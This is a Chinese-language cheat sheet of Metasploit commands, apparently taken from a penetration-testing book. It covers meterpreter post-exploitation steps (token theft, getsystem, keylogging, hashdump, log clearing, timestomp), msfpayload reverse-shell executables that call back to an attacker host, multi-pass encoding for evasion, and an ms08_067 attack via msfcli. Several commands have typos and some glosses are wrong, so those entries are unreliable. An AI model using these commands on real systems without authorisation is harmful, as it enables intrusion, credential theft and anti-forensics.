节选自《metasploit渗透测试指南》

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
show  exploits 列出所有渗透攻击模块
show payloads 列出所有攻击载荷
show auxiliary 列出所有辅助模块
search name 搜索
info 列出详细信息
use name 使用
show options 查看参数

show targets 查看某模块支持的目标平台
show advanced 查看高级选项

set autorunscript migrate -f 攻击完成后自动迁移到另一个进程
check 检测目标是否对选定的渗透攻击存在相应的漏洞
exploit 执行渗透攻击
exploit -j 后台执行
exploit -z 成功渗透后不与会话交互
exploit -e encoder 指定攻击载荷编码方式
exploit -h 帮助

sessions -l 列出多个会话
sessions -l -v 列出会话同时列出详细信息
sessions -s scritp 在所有活跃会话中执行特定meterpreter脚本
sessions -K 杀死所有活跃会话
sessions -c cmd 在所有活跃会话上执行某命定
sessions -u sessionID 升级一个普通的win shell 到 meterpreter shell

db_conreate name 创建数据库
db_connect name 链接数据库
db_namp 把namp的扫描结果存入数据库  hosts services查看结果
db_autopwn -h
db_autopwn -p -r-e 对发现的所有端口执行db_autopwn
db_destroy 删除当前数据库
db_destory user:pswd@host:port/dbname
db_status 查看

meterpreter命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
help 帮助
run scriptname 运行meterpreter脚本, 在scripts/meterpreter目录
sysinfo列出受控住记系统信息
ls 列目录
use priv 扩展meterpreter库
ps 列进程
migrate PID 迁移
use incognito 加载incognito功能来盗取用户令牌
list_tokens -u 列出目标主机用户可用令牌
list_tokens -g 同上,列出用户组的
impersonate_token DOMAIN_NAME\\USERNAME
steal_token PID 到去给定进程的可用令牌进行假冒
drop_token 停止假冒令牌
getsystem 提权
shell 利用可用令牌运行shell
execute -f cmd.exe -i 执行cmd
execute -f cmd.exe -i -t  用可用令牌执行cmd

execute -f cmd.exe -i -H -t 用所有可用令牌执行cmd并隐藏该进程
rev2self 回到初始用户
reg commend 操作注册表
setdesktop number 切换用户界面
screenshot 屏幕截图
upload/download file 上传下载文件
keyscan_start/dump/stop  键盘记录
getprivs 提权??
uictl enable keyboart/mouse  操纵目标的键盘鼠标
background 将当前的seterpreter shell 转为后台执行
hashdump 导出目标主机口令hash值
use sniffer 加载嗅探模块
sniffer_interfaces 列出开放大端口
sniffer_dump interfaceID pcapname 启动嗅探
sniffer_start interfaceID packer-buffer 数据包缓冲区嗅探
sniffer_stats interfaceID 嗅探的统计数据
sniffer_stop interfaceID 停止嗅探
clearv 清除日志
timestomp 修改文件属性 反取证调查
reboot 重起


msfpayload命令

1
2
3
4
5
6
7
8
msfpayload -h 帮助
msfpayload windows/meterpreter/bind_tcp O 列出可用的攻击载荷
msfpayload windows/meterpreter/bind_tcp O. 列出可用的攻击载荷配置项
msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xx X > payload.exe 生成exe

msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xx R > payload.raw 生成raw原始文件,在msfencode中使用
msfpayload windows/meterpreter/bind_tcp LPORT=xx C > payload.c 生成c格式的shell code
msfpayload windows/meterpreter/bind_tcp LPORT=xx J > payload.java 生成javascript字符串


msfencode 命令

1
2
3
4
5
6
7
-h 帮助
-l 列出可用的编码器
-k 隐藏(不一定每次都可用)
msfencode -i raw文件 -o 输出文件名 -x 指定模板 -e 编码器 -c 次数 -t 生成什么格式
msfpayload windows/meterpreter/bind_tcp LPORT=xx R|msfencode -e x86/_countdown -c 5 -t raw| msfencode -e x86/shikata_ga_nai -c 5 -t exe -o mulit_encode.exe
多次编码示例
msfencode -i xx.raw BufferRedister=ESI -e x86/alpha_mixed -t c  创建一个纯数字字母的shellcode 由esi指向,c语言输出


msfcli命令

1
2
3
4
msfcli|gerp exploit 列出攻击模块
msfcli|grep exploit/windows 列出windows相关模块
msfcli expliot/windows/smb/ms08_067_netapi PAYLOAD= windows/meterpreter/bind_tcp LPORT=443 RHOST=x.x.x.x E
对目标发起netapi攻击 bind_tcp载荷 绑定443端口